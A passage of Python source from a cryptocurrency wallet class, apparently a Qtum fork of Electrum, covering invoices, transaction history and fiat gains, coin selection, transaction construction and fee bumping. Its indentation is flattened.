self.frozen_coins = set(storage.get('frozen_coins', [])) # set of txid:vout strings
self.fiat_value = storage.get('fiat_value', {})
self.receive_requests = storage.get('payment_requests', {})
self.invoices = storage.get('invoices', {})
# convert invoices
# TODO invoices being these contextual dicts even internally,
# where certain keys are only present depending on values of other keys...
# it's horrible. we need to change this, at least for the internal representation,
# to something that can be typed.
for invoice_key, invoice in self.invoices.items():
if invoice.get('type') == PR_TYPE_ONCHAIN:
outputs = [PartialTxOutput.from_legacy_tuple(*output) for output in invoice.get('outputs')]
invoice['outputs'] = outputs
self._prepare_onchain_invoice_paid_detection()
self.calc_unused_change_addresses()
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
self.contacts = Contacts(self.storage)
self._coin_price_cache = {}
# lightning
ln_xprv = self.storage.get('lightning_privkey2')
self.lnworker = LNWallet(self, ln_xprv) if ln_xprv else None
def has_lightning(self):
return bool(self.lnworker)
def init_lightning(self):
if self.storage.get('lightning_privkey2'):
return
if not is_using_fast_ecc():
raise Exception('libsecp256k1 library not available. '
'Verifying Lightning channels is too computationally expensive without libsecp256k1, aborting.')
# TODO derive this deterministically from wallet.keystore at keystore generation time
# probably along a hardened path ( lnd-equivalent would be m/1017'/coinType'/ )
seed = os.urandom(32)
node = BIP32Node.from_rootseed(seed, xtype='standard')
ln_xprv = node.to_xprv()
self.storage.put('lightning_privkey2', ln_xprv)
self.storage.write()
def remove_lightning(self):
if not self.storage.get('lightning_privkey2'):
return
if bool(self.lnworker.channels):
raise Exception('Error: This wallet has channels')
self.storage.put('lightning_privkey2', None)
self.storage.write()
def stop_threads(self):
super().stop_threads()
if any([ks.is_requesting_to_be_rewritten_to_wallet_file for ks in self.get_keystores()]):
self.save_keystore()
self.storage.write()
def set_up_to_date(self, b):
super().set_up_to_date(b)
if b: self.storage.write()
def clear_history(self):
super().clear_history()
self.storage.write()
def start_network(self, network):
AddressSynchronizer.start_network(self, network)
if self.lnworker:
network.maybe_init_lightning()
self.lnworker.start_network(network)
def load_and_cleanup(self):
self.load_keystore()
self.test_addresses_sanity()
super().load_and_cleanup()
@abstractmethod
def load_keystore(self) -> None:
pass
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def get_master_public_keys(self):
return []
def basename(self) -> str:
return self.storage.basename()
def test_addresses_sanity(self) -> None:
addrs = self.get_receiving_addresses()
if len(addrs) > 0:
addr = str(addrs[0])
if not bitcoin.is_address(addr):
neutered_addr = addr[:5] + '..' + addr[-2:]
raise WalletFileException(f'The addresses in this wallet are not Qtum addresses.\n'
f'e.g. {neutered_addr} (length: {len(addr)})')
def calc_unused_change_addresses(self):
with self.lock:
if hasattr(self, '_unused_change_addresses'):
addrs = self._unused_change_addresses
else:
addrs = self.get_change_addresses()
self._unused_change_addresses = [addr for addr in addrs if not self.is_used(addr)]
return list(self._unused_change_addresses)
def is_deterministic(self) -> bool:
return self.keystore.is_deterministic()
def set_label(self, name: str, text: str = None) -> bool:
if not name:
return False
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text is not None:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def set_fiat_value(self, txid, ccy, text, fx, value_sat):
if not self.db.get_transaction(txid):
return
# since fx is inserting the thousands separator,
# and not util, also have fx remove it
text = fx.remove_thousands_separator(text)
def_fiat = self.default_fiat_value(txid, fx, value_sat)
formatted = fx.ccy_amount_str(def_fiat, commas=False)
def_fiat_rounded = Decimal(formatted)
reset = not text
if not reset:
try:
text_dec = Decimal(text)
text_dec_rounded = Decimal(fx.ccy_amount_str(text_dec, commas=False))
reset = text_dec_rounded == def_fiat_rounded
except:
# garbage. not resetting, but not saving either
return False
if reset:
d = self.fiat_value.get(ccy, {})
if d and txid in d:
d.pop(txid)
else:
# avoid saving empty dict
return True
else:
if ccy not in self.fiat_value:
self.fiat_value[ccy] = {}
self.fiat_value[ccy][txid] = text
self.storage.put('fiat_value', self.fiat_value)
return reset
def get_fiat_value(self, txid, ccy):
fiat_value = self.fiat_value.get(ccy, {}).get(txid)
try:
return Decimal(fiat_value)
except:
return
def is_mine(self, address) -> bool:
return bool(self.get_address_index(address))
def is_change(self, address) -> bool:
if not self.is_mine(address):
return False
return self.get_address_index(address)[0] == 1
@abstractmethod
def get_address_index(self, address: str) -> Optional[AddressIndexGeneric]:
pass
@abstractmethod
def get_redeem_script(self, address: str) -> Optional[str]:
pass
@abstractmethod
def get_witness_script(self, address: str) -> Optional[str]:
pass
@abstractmethod
def get_txin_type(self, address: str) -> str:
"""Return script type of wallet address."""
pass
def export_private_key(self, address, password) -> str:
if self.is_watching_only():
raise Exception(_("This is a watching-only wallet"))
if not is_address(address):
raise Exception(f"Invalid qtum address: {address}")
if not self.is_mine(address):
raise Exception(_('Address not in wallet.') + f' {address}')
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
txin_type = self.get_txin_type(address)
serialized_privkey = bitcoin.serialize_privkey(pk, compressed, txin_type)
return serialized_privkey
@abstractmethod
def get_public_keys(self, address: str) -> Sequence[str]:
pass
def get_public_keys_with_deriv_info(self, address: str) -> Dict[bytes, Tuple[KeyStoreWithMPK, Sequence[int]]]:
"""Returns a map: pubkey -> (keystore, derivation_suffix)"""
return {}
def get_tx_info(self, tx) -> TxWalletDetails:
is_relevant, is_mine, v, fee = self.get_wallet_delta(tx)
if fee is None and isinstance(tx, PartialTransaction):
fee = tx.get_fee()
exp_n = None
can_broadcast = False
can_bump = False
tx_hash = tx.txid()
tx_we_already_have_in_db = self.db.get_transaction(tx_hash)
can_save_as_local = (is_relevant and tx.txid() is not None
and (tx_we_already_have_in_db is None or not tx_we_already_have_in_db.is_complete()))
label = ''
tx_mined_status = self.get_tx_height(tx_hash)
if tx.is_complete():
if tx_we_already_have_in_db:
label = self.get_label(tx_hash)
if tx_mined_status.height > 0:
if tx_mined_status.conf:
status = _("{} confirmations").format(tx_mined_status.conf)
else:
status = _('Not verified')
elif tx_mined_status.height in (TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED):
status = _('Unconfirmed')
if fee is None:
fee = self.get_tx_fee(tx_hash)
if fee and self.network and self.config.has_fee_mempool():
size = tx.estimated_size()
fee_per_byte = fee / size
exp_n = self.config.fee_to_depth(fee_per_byte)
can_bump = is_mine and not tx.is_final()
else:
status = _('Local')
can_broadcast = self.network is not None
can_bump = is_mine and not tx.is_final()
else:
status = _("Signed")
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
status = _("Unsigned") if s == 0 else _('Partially signed') + ' (%d/%d)'%(s,r)
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
return TxWalletDetails(
txid=tx_hash,
status=status,
label=label,
can_broadcast=can_broadcast,
can_bump=can_bump,
can_save_as_local=can_save_as_local,
amount=amount,
fee=fee,
tx_mined_status=tx_mined_status,
mempool_depth_bytes=exp_n,
)
def get_spendable_coins(self, domain, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
confirmed_only = self.config.get('confirmed_only', False)
utxos = self.get_utxos(domain,
excluded_addresses=self.frozen_addresses,
mature_only=True,
confirmed_only=confirmed_only,
nonlocal_only=nonlocal_only)
utxos = [utxo for utxo in utxos if not self.is_frozen_coin(utxo)]
return utxos
@abstractmethod
def get_receiving_addresses(self, *, slice_start=None, slice_stop=None) -> Sequence[str]:
pass
@abstractmethod
def get_change_addresses(self, *, slice_start=None, slice_stop=None) -> Sequence[str]:
pass
def dummy_address(self):
# first receiving address
return self.get_receiving_addresses(slice_start=0, slice_stop=1)[0]
def get_addresses_sort_by_balance(self):
addrs = []
for addr in self.get_addresses():
c, u, x = self.get_addr_balance(addr)
addrs.append((addr, c + u))
return list([addr[0] for addr in sorted(addrs, key=lambda y: (-int(y[1]), y[0]))])
def get_spendable_addresses(self, min_amount=0.000000001):
result = []
for addr in self.get_addresses():
c, u, x = self.get_addr_balance(addr)
if c >= min_amount:
result.append(addr)
return result
def get_frozen_balance(self):
if not self.frozen_coins: # shortcut
return self.get_balance(self.frozen_addresses)
c1, u1, x1 = self.get_balance()
c2, u2, x2 = self.get_balance(excluded_addresses=self.frozen_addresses,
excluded_coins=self.frozen_coins)
return c1-c2, u1-u2, x1-x2
def balance_at_timestamp(self, domain, target_timestamp):
# we assume that get_history returns items ordered by block height
# we also assume that block timestamps are monotonic (which is false...!)
h = self.get_history(domain=domain)
balance = 0
for hist_item in h:
balance = hist_item.balance
if hist_item.tx_mined_status.timestamp is None or hist_item.tx_mined_status.timestamp > target_timestamp:
return balance - hist_item.delta
# return last balance
return balance
def get_onchain_history(self, *, domain=None):
for hist_item in self.get_history(domain=domain):
yield {
'txid': hist_item.txid,
'fee_sat': hist_item.fee,
'height': hist_item.tx_mined_status.height,
'confirmations': hist_item.tx_mined_status.conf,
'timestamp': hist_item.tx_mined_status.timestamp,
'incoming': True if hist_item.delta>0 else False,
'bc_value': Satoshis(hist_item.delta),
'bc_balance': Satoshis(hist_item.balance),
'date': timestamp_to_datetime(hist_item.tx_mined_status.timestamp),
'label': self.get_label(hist_item.txid),
'txpos_in_block': hist_item.tx_mined_status.txpos,
}
def create_invoice(self, outputs: List[PartialTxOutput], message, pr, URI):
if '!' in (x.value for x in outputs):
amount = '!'
else:
amount = sum(x.value for x in outputs)
invoice = {
'type': PR_TYPE_ONCHAIN,
'message': message,
'outputs': outputs,
'amount': amount,
}
if pr:
invoice['bip70'] = pr.raw.hex()
invoice['time'] = pr.get_time()
invoice['exp'] = pr.get_expiration_date() - pr.get_time()
invoice['requestor'] = pr.get_requestor()
invoice['message'] = pr.get_memo()
elif URI:
timestamp = URI.get('time')
if timestamp: invoice['time'] = timestamp
exp = URI.get('exp')
if exp: invoice['exp'] = exp
if 'time' not in invoice:
invoice['time'] = int(time.time())
return invoice
def save_invoice(self, invoice):
invoice_type = invoice['type']
if invoice_type == PR_TYPE_LN:
key = invoice['rhash']
elif invoice_type == PR_TYPE_ONCHAIN:
key = bh2u(sha256(repr(invoice))[0:16])
invoice['id'] = key
outputs = invoice['outputs'] # type: List[PartialTxOutput]
with self.transaction_lock:
for txout in outputs:
self._invoices_from_scriptpubkey_map[txout.scriptpubkey].add(key)
else:
raise Exception('Unsupported invoice type')
self.invoices[key] = invoice
self.storage.put('invoices', self.invoices)
self.storage.write()
def clear_invoices(self):
self.invoices = {}
self.storage.put('invoices', self.invoices)
self.storage.write()
def get_invoices(self):
out = [self.get_invoice(key) for key in self.invoices.keys()]
out = list(filter(None, out))
out.sort(key=operator.itemgetter('time'))
return out
def get_invoice(self, key):
if key not in self.invoices:
return
item = copy.copy(self.invoices[key])
request_type = item.get('type')
if request_type == PR_TYPE_ONCHAIN:
item['status'] = PR_PAID if self._is_onchain_invoice_paid(item)[0] else PR_UNPAID
elif self.lnworker and request_type == PR_TYPE_LN:
item['status'] = self.lnworker.get_payment_status(bfh(item['rhash']))
else:
return
return item
def _get_relevant_invoice_keys_for_tx(self, tx: Transaction) -> Set[str]:
relevant_invoice_keys = set()
for txout in tx.outputs():
for invoice_key in self._invoices_from_scriptpubkey_map.get(txout.scriptpubkey, set()):
relevant_invoice_keys.add(invoice_key)
return relevant_invoice_keys
def _prepare_onchain_invoice_paid_detection(self):
# scriptpubkey -> list(invoice_keys)
self._invoices_from_scriptpubkey_map = defaultdict(set) # type: Dict[bytes, Set[str]]
for invoice_key, invoice in self.invoices.items():
if invoice.get('type') == PR_TYPE_ONCHAIN:
outputs = invoice['outputs'] # type: List[PartialTxOutput]
for txout in outputs:
self._invoices_from_scriptpubkey_map[txout.scriptpubkey].add(invoice_key)
def _is_onchain_invoice_paid(self, invoice) -> Tuple[bool, Sequence[str]]:
"""Returns whether on-chain invoice is satisfied, and list of relevant TXIDs."""
assert invoice.get('type') == PR_TYPE_ONCHAIN
invoice_amounts = defaultdict(int) # type: Dict[bytes, int] # scriptpubkey -> value_sats
for txo in invoice['outputs']: # type: PartialTxOutput
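            # '!' (send-max) outputs have no fixed amount; count them as 1 sat so the
            # check below only requires that something was received on that scriptpubkey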
invoice_amounts[txo.scriptpubkey] += 1 if txo.value == '!' else txo.value
relevant_txs = []
with self.transaction_lock:
for invoice_scriptpubkey, invoice_amt in invoice_amounts.items():
scripthash = bitcoin.script_to_scripthash(invoice_scriptpubkey.hex())
prevouts_and_values = self.db.get_prevouts_by_scripthash(scripthash)
relevant_txs += [prevout.txid.hex() for prevout, v in prevouts_and_values]
total_received = sum([v for prevout, v in prevouts_and_values])
# check that there is at least one TXO, and that they pay enough.
# note: "at least one TXO" check is needed for zero amount invoice (e.g. OP_RETURN)
if len(prevouts_and_values) == 0:
return False, []
if total_received < invoice_amt:
return False, []
return True, relevant_txs
def _maybe_set_tx_label_based_on_invoices(self, tx: Transaction) -> bool:
tx_hash = tx.txid()
with self.transaction_lock:
labels = []
for invoice_key in self._get_relevant_invoice_keys_for_tx(tx):
invoice = self.invoices.get(invoice_key)
if invoice is None: continue
assert invoice.get('type') == PR_TYPE_ONCHAIN
if invoice['message']:
labels.append(invoice['message'])
if labels:
self.set_label(tx_hash, "; ".join(labels))
return bool(labels)
def add_transaction(self, tx, *, allow_unrelated=False):
tx_was_added = super().add_transaction(tx, allow_unrelated=allow_unrelated)
if tx_was_added:
self._maybe_set_tx_label_based_on_invoices(tx)
return tx_was_added
@profiler
def get_full_history(self, fx=None, *, onchain_domain=None, include_lightning=True):
transactions = OrderedDictWithIndex()
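        # merge on-chain and lightning history: lightning items sharing a txid with an
        # on-chain item are folded into that row; the rest get rows of their own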
onchain_history = self.get_onchain_history(domain=onchain_domain)
for tx_item in onchain_history:
txid = tx_item['txid']
transactions[txid] = tx_item
if self.lnworker and include_lightning:
lightning_history = self.lnworker.get_history()
else:
lightning_history = []
for i, tx_item in enumerate(lightning_history):
txid = tx_item.get('txid')
ln_value = Decimal(tx_item['amount_msat']) / 1000
if txid and txid in transactions:
item = transactions[txid]
item['label'] = tx_item['label']
item['ln_value'] = Satoshis(ln_value)
item['ln_balance_msat'] = tx_item['balance_msat']
else:
tx_item['lightning'] = True
tx_item['ln_value'] = Satoshis(ln_value)
tx_item['txpos'] = i # for sorting
key = tx_item['payment_hash'] if 'payment_hash' in tx_item else tx_item['type'] + tx_item['channel_id']
transactions[key] = tx_item
now = time.time()
balance = 0
for item in transactions.values():
# add on-chain and lightning values
value = Decimal(0)
if item.get('bc_value'):
value += item['bc_value'].value
if item.get('ln_value'):
value += item.get('ln_value').value
item['value'] = Satoshis(value)
balance += value
item['balance'] = Satoshis(balance)
if fx:
timestamp = item['timestamp'] or now
fiat_value = value / Decimal(bitcoin.COIN) * fx.timestamp_rate(timestamp)
item['fiat_value'] = Fiat(fiat_value, fx.ccy)
item['fiat_default'] = True
return transactions
@profiler
def get_detailed_history(self, from_timestamp=None, to_timestamp=None,
fx=None, show_addresses=False):
# History with capital gains, using utxo pricing
        # FIXME: Lightning capital gains would require FIFO
out = []
income = 0
expenditures = 0
capital_gains = Decimal(0)
fiat_income = Decimal(0)
fiat_expenditures = Decimal(0)
now = time.time()
for item in self.get_onchain_history():
timestamp = item['timestamp']
if from_timestamp and (timestamp or now) < from_timestamp:
continue
if to_timestamp and (timestamp or now) >= to_timestamp:
continue
tx_hash = item['txid']
tx = self.db.get_transaction(tx_hash)
tx_fee = item['fee_sat']
item['fee'] = Satoshis(tx_fee) if tx_fee is not None else None
if show_addresses:
item['inputs'] = list(map(lambda x: x.to_json(), tx.inputs()))
item['outputs'] = list(map(lambda x: {'address': x.get_ui_address_str(), 'value': Satoshis(x.value)},
tx.outputs()))
# fixme: use in and out values
value = item['bc_value'].value
if value < 0:
expenditures += -value
else:
income += value
# fiat computations
if fx and fx.is_enabled() and fx.get_history_config():
fiat_fields = self.get_tx_item_fiat(tx_hash, value, fx, tx_fee)
fiat_value = fiat_fields['fiat_value'].value
item.update(fiat_fields)
if value < 0:
capital_gains += fiat_fields['capital_gain'].value
fiat_expenditures += -fiat_value
else:
fiat_income += fiat_value
out.append(item)
# add summary
if out:
b, v = out[0]['bc_balance'].value, out[0]['bc_value'].value
start_balance = None if b is None or v is None else b - v
end_balance = out[-1]['bc_balance'].value
if from_timestamp is not None and to_timestamp is not None:
start_date = timestamp_to_datetime(from_timestamp)
end_date = timestamp_to_datetime(to_timestamp)
else:
start_date = None
end_date = None
summary = {
'start_date': start_date,
'end_date': end_date,
'start_balance': Satoshis(start_balance),
'end_balance': Satoshis(end_balance),
'incoming': Satoshis(income),
'outgoing': Satoshis(expenditures)
}
if fx and fx.is_enabled() and fx.get_history_config():
unrealized = self.unrealized_gains(None, fx.timestamp_rate, fx.ccy)
summary['fiat_currency'] = fx.ccy
summary['fiat_capital_gains'] = Fiat(capital_gains, fx.ccy)
summary['fiat_incoming'] = Fiat(fiat_income, fx.ccy)
summary['fiat_outgoing'] = Fiat(fiat_expenditures, fx.ccy)
summary['fiat_unrealized_gains'] = Fiat(unrealized, fx.ccy)
summary['fiat_start_balance'] = Fiat(fx.historical_value(start_balance, start_date), fx.ccy)
summary['fiat_end_balance'] = Fiat(fx.historical_value(end_balance, end_date), fx.ccy)
summary['fiat_start_value'] = Fiat(fx.historical_value(COIN, start_date), fx.ccy)
summary['fiat_end_value'] = Fiat(fx.historical_value(COIN, end_date), fx.ccy)
else:
summary = {}
return {
'transactions': out,
'summary': summary
}
def default_fiat_value(self, tx_hash, fx, value_sat):
return value_sat / Decimal(COIN) * self.price_at_timestamp(tx_hash, fx.timestamp_rate)
def get_tx_item_fiat(self, tx_hash, value, fx, tx_fee):
item = {}
fiat_value = self.get_fiat_value(tx_hash, fx.ccy)
fiat_default = fiat_value is None
fiat_rate = self.price_at_timestamp(tx_hash, fx.timestamp_rate)
fiat_value = fiat_value if fiat_value is not None else self.default_fiat_value(tx_hash, fx, value)
fiat_fee = tx_fee / Decimal(COIN) * fiat_rate if tx_fee is not None else None
item['fiat_currency'] = fx.ccy
item['fiat_rate'] = Fiat(fiat_rate, fx.ccy)
item['fiat_value'] = Fiat(fiat_value, fx.ccy)
item['fiat_fee'] = Fiat(fiat_fee, fx.ccy) if fiat_fee else None
item['fiat_default'] = fiat_default
if value < 0:
acquisition_price = - value / Decimal(COIN) * self.average_price(tx_hash, fx.timestamp_rate, fx.ccy)
liquidation_price = - fiat_value
item['acquisition_price'] = Fiat(acquisition_price, fx.ccy)
cg = liquidation_price - acquisition_price
item['capital_gain'] = Fiat(cg, fx.ccy)
return item
def get_label(self, tx_hash: str) -> str:
return self.labels.get(tx_hash, '') or self.get_default_label(tx_hash)
def get_default_label(self, tx_hash) -> str:
if not self.db.get_txi_addresses(tx_hash):
labels = []
for addr in self.db.get_txo_addresses(tx_hash):
label = self.labels.get(addr)
if label:
labels.append(label)
if labels:
return ', '.join(labels)
try:
tx = self.db.get_transaction(tx_hash)
if tx.outputs()[0].is_coinstake():
is_relevant, is_mine, delta, fee = self.get_wallet_delta(tx)
if delta and 0 < delta < 4 * 10 ** 7:
return _('contract gas refund')
return _('stake mined')
elif tx.inputs()[0].is_coinbase_input():
return 'coinbase'
except (BaseException,) as e:
self.logger.info(f'get_default_label {e}')
return ''
def get_tx_status(self, tx_hash, tx_mined_info: TxMinedInfo):
extra = []
height = tx_mined_info.height
conf = tx_mined_info.conf
timestamp = tx_mined_info.timestamp
is_staked = False
tx = None
try:
tx = self.db.get_transaction(tx_hash) or self.db.get_token_tx(tx_hash)
if tx is not None:
is_staked = tx.outputs()[0].is_coinstake()
except (BaseException,) as e:
self.logger.info(f'get_tx_status {repr(e)}')
if height == TX_HEIGHT_FUTURE:
assert conf < 0, conf
            num_blocks_remaining = -conf
            return 2, f'in {num_blocks_remaining} blocks'
if conf == 0:
if not tx:
return 2, 'unknown'
is_final = tx and tx.is_final()
if not is_final:
extra.append('rbf')
fee = self.get_tx_fee(tx_hash)
if fee is not None:
size = tx.estimated_size()
fee_per_byte = fee / size
extra.append(format_fee_satoshis(fee_per_byte) + ' sat/b')
if fee is not None and height in (TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED) \
and self.config.has_fee_mempool():
exp_n = self.config.fee_to_depth(fee_per_byte)
if exp_n:
extra.append('%.2f MB'%(exp_n/1000000))
if height == TX_HEIGHT_LOCAL:
status = 3
elif height == TX_HEIGHT_UNCONF_PARENT:
status = 1
elif height == TX_HEIGHT_UNCONFIRMED:
status = 0
else:
status = 2 # not SPV verified
elif is_staked:
status = 3 + max(min(conf // (COINBASE_MATURITY // RECOMMEND_CONFIRMATIONS), RECOMMEND_CONFIRMATIONS), 1)
else:
status = 3 + min(conf, RECOMMEND_CONFIRMATIONS)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = TX_STATUS[status] if status < 4 else time_str
if extra:
status_str += ' [%s]'%(', '.join(extra))
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def get_unconfirmed_base_tx_for_batching(self) -> Optional[Transaction]:
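        # look for an unconfirmed outgoing tx of ours that new outputs could be batched into;
        # mempool txs (which must signal RBF) are preferred, local-only txs are kept as fallback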
candidate = None
for hist_item in self.get_history():
# tx should not be mined yet
if hist_item.tx_mined_status.conf > 0: continue
# conservative future proofing of code: only allow known unconfirmed types
if hist_item.tx_mined_status.height not in (TX_HEIGHT_UNCONFIRMED,
TX_HEIGHT_UNCONF_PARENT,
TX_HEIGHT_LOCAL):
continue
# tx should be "outgoing" from wallet
if hist_item.delta >= 0:
continue
tx = self.db.get_transaction(hist_item.txid)
if not tx:
continue
# is_mine outputs should not be spent yet
# to avoid cancelling our own dependent transactions
txid = tx.txid()
if any([self.is_mine(o.address) and self.db.get_spent_outpoint(txid, output_idx)
for output_idx, o in enumerate(tx.outputs())]):
continue
# all inputs should be is_mine
if not all([self.is_mine(self.get_txin_address(txin)) for txin in tx.inputs()]):
continue
# prefer txns already in mempool (vs local)
if hist_item.tx_mined_status.height == TX_HEIGHT_LOCAL:
candidate = tx
continue
# tx must have opted-in for RBF
if tx.is_final(): continue
return tx
return candidate
def get_change_addresses_for_new_transaction(self, preferred_change_addr=None) -> List[str]:
change_addrs = []
if preferred_change_addr:
if isinstance(preferred_change_addr, (list, tuple)):
change_addrs = list(preferred_change_addr)
else:
change_addrs = [preferred_change_addr]
elif self.use_change:
# Recalc and get unused change addresses
addrs = self.calc_unused_change_addresses()
# New change addresses are created only after a few
# confirmations.
if addrs:
# if there are any unused, select all
change_addrs = addrs
else:
# if there are none, take one randomly from the last few
addrs = self.get_change_addresses(slice_start=-self.gap_limit_for_change)
change_addrs = [random.choice(addrs)] if addrs else []
for addr in change_addrs:
assert is_address(addr), f"not valid bitcoin address: {addr}"
            # note that change addresses are not necessarily is_mine
# in which case this is a no-op
self.check_address(addr)
max_change = self.max_change_outputs if self.multiple_change else 1
return change_addrs[:max_change]
def make_unsigned_transaction(self, *, coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], fee=None,
change_addr: str = None, gas_fee=0, sender=None, is_sweep=False) -> PartialTransaction:
if any([c.already_has_some_signatures() for c in coins]):
raise Exception("Some inputs already contain signatures!")
# prevent side-effect with '!'
outputs = copy.deepcopy(outputs)
# check outputs
i_max = None
for i, o in enumerate(outputs):
if o.value == '!':
if i_max is not None:
raise Exception("More than one output set to spend max")
i_max = i
if fee is None and self.config.fee_per_kb() is None:
raise NoDynamicFeeEstimates()
for item in coins:
self.add_input_info(item)
# Fee estimator
if fee is None:
fee_estimator = self.config.estimate_fee
elif isinstance(fee, Number):
fee_estimator = lambda size: fee
elif callable(fee):
fee_estimator = fee
else:
raise Exception(f'Invalid argument fee: {fee}')
if i_max is None:
# Let the coin chooser select the coins to spend
if sender:
coin_chooser = coinchooser.CoinChooserQtum()
else:
coin_chooser = coinchooser.get_coin_chooser(self.config)
# If there is an unconfirmed RBF tx, merge with it
base_tx = self.get_unconfirmed_base_tx_for_batching()
if self.config.get('batch_rbf', False) and base_tx:
# make sure we don't try to spend change from the tx-to-be-replaced:
coins = [c for c in coins if c.prevout.txid.hex() != base_tx.txid()]
is_local = self.get_tx_height(base_tx.txid()).height == TX_HEIGHT_LOCAL
base_tx = PartialTransaction.from_tx(base_tx)
base_tx.add_info_from_wallet(self)
base_tx_fee = base_tx.get_fee()
relayfeerate = Decimal(self.relayfee()) / 1000
original_fee_estimator = fee_estimator
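                # when replacing a tx already in the mempool, the new fee must cover the old fee
                # plus relay fee for the added size; a local-only base tx has no such floor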
def fee_estimator(size: Union[int, float, Decimal]) -> int:
size = Decimal(size)
lower_bound = base_tx_fee + round(size * relayfeerate)
lower_bound = lower_bound if not is_local else 0
return int(max(lower_bound, original_fee_estimator(size)))
txi = base_tx.inputs()
txo = list(filter(lambda o: not self.is_change(o.address), base_tx.outputs()))
old_change_addrs = [o.address for o in base_tx.outputs() if self.is_change(o.address)]
else:
txi = []
txo = []
old_change_addrs = []
# change address. if empty, coin_chooser will set it
change_addrs = self.get_change_addresses_for_new_transaction(change_addr or old_change_addrs)
tx = coin_chooser.make_tx(coins=coins,
inputs=txi,
outputs=list(outputs) + txo,
change_addrs=change_addrs,
fee_estimator_vb=fee_estimator,
dust_threshold=self.dust_threshold(),
gas_fee=gas_fee,
sender=sender)
else:
# "spend max" branch
# note: This *will* spend inputs with negative effective value (if there are any).
# Given as the user is spending "max", and so might be abandoning the wallet,
# try to include all UTXOs, otherwise leftover might remain in the UTXO set
# forever. see #5433
# note: Actually it might be the case that not all UTXOs from the wallet are
# being spent if the user manually selected UTXOs.
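            # build the tx once with a zero placeholder on the '!' output to estimate its size,
            # then fill in the real amount and rebuild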
sendable = sum(map(lambda c: c.value_sats(), coins))
outputs[i_max].value = 0
tx = PartialTransaction.from_io(list(coins), list(outputs))
fee = fee_estimator(tx.estimated_size())
fee = fee + gas_fee
amount = sendable - tx.output_value() - fee
if amount < 0:
raise NotEnoughFunds()
outputs[i_max].value = amount
tx = PartialTransaction.from_io(list(coins), list(outputs))
# sender sort to make sure sender txi the first place
tx.sender_sort(sender)
# Timelock tx to current height.
tx.locktime = get_locktime_for_new_transaction(self.network)
tx.add_info_from_wallet(self)
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, *, outputs: List[PartialTxOutput], password=None, fee=None, change_addr=None,
domain=None, rbf=False, nonlocal_only=False, tx_version=None, sign=True) -> PartialTransaction:
coins = self.get_spendable_coins(domain, nonlocal_only=nonlocal_only)
tx = self.make_unsigned_transaction(coins=coins,
outputs=outputs,
fee=fee,
change_addr=change_addr)
tx.set_rbf(rbf)
if tx_version is not None:
tx.version = tx_version
if sign:
self.sign_transaction(tx, password)
return tx
def is_frozen_address(self, addr: str) -> bool:
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: PartialTxInput) -> bool:
prevout_str = utxo.prevout.to_str()
return prevout_str in self.frozen_coins
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
"""Set frozen state of the addresses to FREEZE, True or False"""
if all(self.is_mine(addr) for addr in addrs):
# FIXME take lock?
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
self.storage.put('frozen_addresses', list(self.frozen_addresses))
return True
return False
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
"""Set frozen state of the utxos to FREEZE, True or False"""
utxos = {utxo.prevout.to_str() for utxo in utxos}
# FIXME take lock?
if freeze:
self.frozen_coins |= set(utxos)
else:
self.frozen_coins -= set(utxos)
self.storage.put('frozen_coins', list(self.frozen_coins))
def wait_until_synchronized(self, callback=None):
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "{}\n{} {}".format(
_("Please wait..."),
_("Addresses generated:"),
len(self.get_addresses()))
callback(msg)
time.sleep(0.1)
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "{} \n".format(_("Connecting..."))
callback(msg)
time.sleep(0.1)
# wait until we are connected, because the user
# might have selected another server
if self.network:
self.logger.info("waiting for network...")
wait_for_network()
self.logger.info("waiting while wallet is syncing...")
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def address_is_old(self, address: str, *, req_conf: int = 3) -> bool:
"""Returns whether address has any history that is deeply confirmed."""
max_conf = -1
h = self.db.get_addr_history(address)
needs_spv_check = not self.config.get("skipmerklecheck", False)
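        # with merkle checking disabled, trust the server-reported height to compute confirmations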
for tx_hash, tx_height in h:
if needs_spv_check:
tx_age = self.get_tx_height(tx_hash).conf
else:
if tx_height <= 0:
tx_age = 0
else:
tx_age = self.get_local_height() - tx_height + 1
max_conf = max(max_conf, tx_age)
return max_conf >= req_conf
def bump_fee(self, *, tx: Transaction, new_fee_rate: Union[int, float, Decimal],
coins: Sequence[PartialTxInput] = None) -> PartialTransaction:
"""Increase the miner fee of 'tx'.
'new_fee_rate' is the target min rate in sat/vbyte
'coins' is a list of UTXOs we can choose from as potential new inputs to be added
"""
if tx.is_final():
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('transaction is final'))
new_fee_rate = quantize_feerate(new_fee_rate) # strip excess precision
old_tx_size = tx.estimated_size()
old_txid = tx.txid()
assert old_txid
old_fee = self.get_tx_fee(old_txid)
if old_fee is None:
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('current fee unknown'))
old_fee_rate = old_fee / old_tx_size # sat/vbyte
if new_fee_rate <= old_fee_rate:
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _("The new fee rate needs to be higher than the old fee rate."))
try:
# method 1: keep all inputs, keep all not is_mine outputs,
# allow adding new inputs
